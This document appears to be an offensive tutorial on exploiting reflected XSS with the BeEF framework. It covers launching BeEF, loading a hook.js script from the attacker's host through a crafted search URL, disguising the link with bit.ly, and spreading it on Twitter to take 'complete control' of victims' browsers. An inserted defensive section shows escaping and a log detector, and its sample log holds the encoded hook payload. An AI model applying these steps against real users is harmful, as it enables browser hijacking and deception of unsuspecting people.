Exploiting XSS with BeEF: Part 2
Now that we have our vulnerable server, it's time to start up BeEF.
If you have Kali, BeEF comes pre-installed. You can find it in /usr/share/beef-xss/. Once you're there, type ./beef to execute the program.
Once you have run BeEF, you can access the web UI through your browser. Type http://your_ip:3000/ui/panel and you will be redirected to the login page.
The default credentials are beef for both the username and password. After logging in, you will be presented with the start/help screen.
Remember that line of text from the terminal earlier? That's the location of our malicious JS code. For me, it's http://10.0.2.13:3000/hook.js .
Since we want this to be run as code, we will implement this with the <script> element of HTML. Your <script> line should look similar to this:
When the victim visits this website, it automatically "searches" for whatever follows query= in the URL. But because what follows is a script tag, the browser runs it as a script instead of treating it as a search term.
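To make the reflection concrete from the defender's side, here is an added example (not code from the article or from BeEF) showing a minimal search handler that echoes the query unescaped beside its hardened form, plus a check that flags requests carrying a script tag in any query parameter. The function names, the page template and the log lines are assumptions constructed for the example.

```python
# Added example: the reflected-XSS pattern the article describes, its fix, and a log check.
# Names (render_search_*, find_reflected_scripts) are assumptions, not the tutorial's code.
import html
import re
from urllib.parse import parse_qs, urlparse

PAGE = "<html><body><h1>Results for: {q}</h1></body></html>"


def render_search_vulnerable(query: str) -> str:
    """Reflects the query unescaped, so '<script src=...>' is parsed as markup and executed."""
    return PAGE.format(q=query)


def render_search_hardened(query: str) -> str:
    """HTML-escapes the query: '<' becomes '&lt;', so the browser shows text instead of running it."""
    return PAGE.format(q=html.escape(query, quote=True))


# Constructed sample access-log lines (not real traffic); only the request path is parsed.
SAMPLE_LOG = """\
10.0.2.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search?query=cats HTTP/1.1" 200 512
10.0.2.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search?query=%3Cscript+src%3D%22http%3A%2F%2F10.0.2.13%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E HTTP/1.1" 200 600
10.0.2.9 - - [01/Jan/2024:10:00:09 +0000] "GET /search?query=script+kiddies HTTP/1.1" 200 520
"""

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)   # matches an opening script tag
REQ_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')        # pulls the request target out of the line


def find_reflected_scripts(log_text: str) -> list:
    """Return (client_ip, decoded_parameter) pairs for requests with a script tag in any query value."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_LINE.search(line)
        if not m:
            continue
        # parse_qs URL-decodes each value, so encoded %3Cscript is checked in its decoded form
        params = parse_qs(urlparse(m.group(1)).query, keep_blank_values=True)
        for values in params.values():
            for value in values:
                if SCRIPT_TAG.search(value):
                    hits.append((line.split()[0], value))
    return hits
```

Running the check over the sample log reports only the second request; the word "script" alone in a search term does not trigger it.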
In order to "hook" their browser, we need to send them this link. Of course, this might seem suspicious to the average user. However, if we were to use a URL shortener like bit.ly, the link would be hidden, and more people would click on it on social media.
Most websites that allow you to share articles/videos, etc. automatically include a bit.ly link in the message. If you were to share this bit.ly link on Twitter, no one will think of it being malicious.
Once someone clicks on that innocent-looking link, you will have complete control over their browser! If you are attacking over WAN, don't forget to port forward.
In my next article, I will be explaining how to get a persistent connection with BeEF, including how to get a shell on the victim PC.
C|H of C3